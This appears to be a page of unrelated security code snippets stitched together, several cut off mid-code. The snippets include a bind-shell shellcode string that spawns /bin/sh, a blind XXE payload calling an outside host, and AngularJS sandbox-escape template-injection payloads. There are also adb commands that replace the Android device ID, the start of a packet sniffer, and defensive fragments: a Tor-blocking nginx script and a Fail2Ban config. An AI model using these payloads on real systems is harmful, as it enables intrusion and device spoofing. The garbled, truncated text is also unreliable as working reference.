| echo "unsigned char shellcode[] = \"\\x31\\xc0\\x40\\x74\\x60\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\xb3\\x01\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\\xc6\\xb0\\x66\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x52\\x56\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x05\\x52\\x52\\x56\\x89\\xe1\\xcd\\x80\\x93\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x92\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x50\\x89\\xe2\\xb0\\x0b\\xcd\\x80\\x48\\x31\\xc0\\x48\\x31\\xff\\x48\\x31\\xf6\\x48\\x31\\xd2\\x4d\\x31\\xc0\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x6a\\x06\\x5a\\x6a\\x29\\x58\\x0f\\x05\\x49\\x89\\xc0\\x4d\\x31\\xd2\\x41\\x52\\x41\\x52\\xc6\\x04\\x24\\x02\\x66\\xc7\\x44\\x24\\x02\\x11\\x5c\\x48\\x89\\xe6\\x41\\x50\\x5f\\x6a\\x10\\x5a\\x6a\\x31\\x58\\x0f\\x05\\x41\\x50\\x5f\\x6a\\x01\\x5e\\x6a\\x32\\x58\\x0f\\x05\\x48\\x89\\xe6\\x48\\x31\\xc9\\xb1\\x10\\x51\\x48\\x89\\xe2\\x41\\x50\\x5f\\x6a\\x2b\\x58\\x0f\\x05\\x59\\x |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
Apacje Struts is a open source framework utilizing JavaEE web applications and encouraging to employ MVC (Model View Controller) architecture. When having the application developed in so-called devMode as set in the struts.xml file:
<constant name="struts.devMode" value="true" />
Then the middleware will be handling additional parameters passed to every function invocation.
| #!/usr/bin/env python3 | |
| from scapy.all import * | |
| import logging | |
| logging.getLogger("scapy.runtime").setLevel(logging.ERROR) | |
| import re | |
| def packet_callback(packet): | |
| if packet[TCP].payload: | |
| pkt = str(packet[TCP].payload) | |
| if packet[IP].dport == 80: |
| android.permission.ACCESS_ALL_DOWNLOADS | |
| android.permission.ACCESS_BLUETOOTH_SHARE | |
| android.permission.ACCESS_CACHE_FILESYSTEM | |
| android.permission.ACCESS_CHECKIN_PROPERTIES | |
| android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY | |
| android.permission.ACCESS_DOWNLOAD_MANAGER | |
| android.permission.ACCESS_DOWNLOAD_MANAGER_ADVANCED | |
| android.permission.ACCESS_DRM_CERTIFICATES | |
| android.permission.ACCESS_EPHEMERAL_APPS | |
| android.permission.ACCESS_FM_RADIO |
| adb shell content query --uri content://settings/secure --where "name=\'android_id\'" | |
| adb shell content delete --uri content://settings/secure --where "name=\'android_id\'" | |
| adb shell content insert --uri content://settings/secure --bind name:s:android_id --bind value:s:7373de1e9e9670c2 |
| wget -qO- https://check.torproject.org/exit-addresses | grep ExitAddress | cut -d ' ' -f 2 | sed "s/^/deny /g; s/$/;/g" > /etc/nginx/conf.d/tor-block.conf; systemctl reload nginx |
| # Fail2Ban configuration file | |
| # | |
| # NOTE | |
| # You should set up in the jail.conf file, the maxretry and findtime carefully in order to avoid false positives. | |
| # | |
| # Author: http://www.go2linux.org | |
| # Modified by: samnicholls.net | |
| # * Mon 6 Jun 2016 - Updated failregex to capture HOST group correctly | |
| [Definition] |
#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1